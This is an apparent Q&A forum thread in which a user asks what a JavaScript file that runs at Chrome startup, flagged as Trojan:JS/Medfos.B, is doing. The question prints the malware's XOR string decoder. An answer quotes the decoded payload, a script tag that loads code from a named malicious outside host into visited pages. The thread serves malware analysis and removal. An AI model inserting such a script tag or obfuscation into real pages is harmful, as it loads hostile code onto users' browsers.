# This JavaScript code is executed every time Chrome starts up. My antivirus says it's a trojan. What is it doing?

Tags: javascript, google-chrome

**EDIT:** Originally thought this was bundled *with* Chrome but it was probably already on my machine, unless it's part of the PortableApps.com Chrome Portable package.

---

This JS file is executed every time I start up Chrome, from a temp directory.

`C:\Users\Username\AppData\Local\Temp\ChromiumPortableTemp\scoped_dir_2280_30150\CRX_INSTALL\manager.js`

Researching this, apparently it's something to do with Chrome Update Manager, but I can't say what.

My antivirus (Comodo) identifies it as a `Trojan:JS/Medfos.B`.

From the code, I can decipher that it analyzes the current page URL (probably with an MD5 function?) and inserts some element into the page if the URL matches a pre-defined one.

The full code is here: http://paste2.org/fYPXA0pb

I think this is the MD5 function part:

```
function n2(r3)
{
   o3='';
   for(var i=0;i<(r3.length/2);i++)
   {
      o3 +=String.fromCharCode(parseInt(r3.substring(i*2,i*2+2),16)^(i&0x0ff));
   }
   return o3;
}
```

I'd *really* like to know what this is doing!

Comment: [It's an artifact of a trojan.](http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:JS/Medfos.B)

Comment: Why would it be bundled with Chrome, then?

Comment: @chromequestioner What's so hard to understand about this? It's part of a trojan infection. *It's bundled itself with chrome so it can do naughty things.*

Comment: @asawyer It only appeared when I installed Chrome using the (official) installer. I assumed it came as part of that installer. If, however, it's been on my system before now and has been dormant until awoken by Chrome, that would explain it better. I'd still like to know if it came with Chrome or not though.

Comment: @MatthewMartin I should have mentioned I tried Chrome *and* Chromium. I gather from these comments that the trojan was probably already on my machine, though.

Answer (score 1):

This code adds the following script tag to your document. **Beware it is indeed a site with malicious software**.

```
<script src="http://disable-instant-search.com/js/disable.js?type=live&amp;user-agent=.....;gsu=...."></script>
```

And it does not relate Chrome Update Manager. If something is in your chrome directory, that does not mean it actually belongs to Google or Chrome. It may have been put there but other viruses on you machine

Comment: Thanks. That explains it. Now I need to figure out how it got on my machine, and how to remove it. :)

Answer (score 0):

The function you cite is a decrypt function. It is called multiple times in the rest of the code. Paste the n2 function definition into a JavaScript console then copy paste the calls form the rest of the code :

```
function n2 (r3) {
   o3='';
   for(var i=0;i<(r3.length/2);i++) {
      o3 +=String.fromCharCode(parseInt(r3.substring(i*2,i*2+2),16)^(i&0x0ff));
   }
   return o3;
}

n2('6172692d676a6b292255257c696f20254b374e2c49642b') ==> "ReferenceError: n2 is not defined"
```